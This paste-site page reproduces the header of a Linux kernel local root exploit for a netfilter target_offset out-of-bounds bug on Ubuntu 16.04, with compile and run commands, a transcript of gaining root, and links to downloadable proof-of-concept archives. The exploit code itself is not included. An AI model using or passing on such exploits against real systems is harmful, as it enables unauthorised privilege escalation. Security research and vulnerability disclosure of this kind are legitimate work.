SHOW:
|
|
- or go back to the newest paste.
1 | Source: https://twitter.com/vnik5287/status/748843859065483264 | |
2 | ||
3 | /** | |
4 | * Ubuntu 16.04 local root exploit - netfilter target_offset OOB | |
5 | * check_compat_entry_size_and_hooks/check_entry | |
6 | * | |
7 | * Tested on 4.4.0-21-generic. SMEP/SMAP bypass available in descr_v2.c | |
8 | * | |
9 | * Vitaly Nikolenko | |
10 | * vnik@cyseclabs.com | |
11 | * 23/04/2016 | |
12 | * | |
13 | * | |
14 | * ip_tables.ko needs to be loaded (e.g., iptables -L as root triggers | |
15 | * automatic loading). | |
16 | * | |
17 | * vnik@ubuntu:~$ uname -a | |
18 | * Linux ubuntu 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:33:37 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux | |
19 | * vnik@ubuntu:~$ gcc decr.c -m32 -O2 -o decr | |
20 | * vnik@ubuntu:~$ gcc pwn.c -O2 -o pwn | |
21 | * vnik@ubuntu:~$ ./decr | |
22 | * netfilter target_offset Ubuntu 16.04 4.4.0-21-generic exploit by vnik | |
23 | * [!] Decrementing the refcount. This may take a while... | |
24 | * [!] Wait for the "Done" message (even if you'll get the prompt back). | |
25 | * vnik@ubuntu:~$ [+] Done! Now run ./pwn | |
26 | * | |
27 | * vnik@ubuntu:~$ ./pwn | |
28 | * [+] Escalating privs... | |
29 | * root@ubuntu:~# id | |
30 | * uid=0(root) gid=0(root) groups=0(root) | |
31 | * root@ubuntu:~# | |
32 | * | |
33 | */ | |
34 | ||
35 | Proof of Concept: | |
36 | https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40053.zip | |
37 | https://cyseclabs.com/exploits/target_offset_vnik.zip |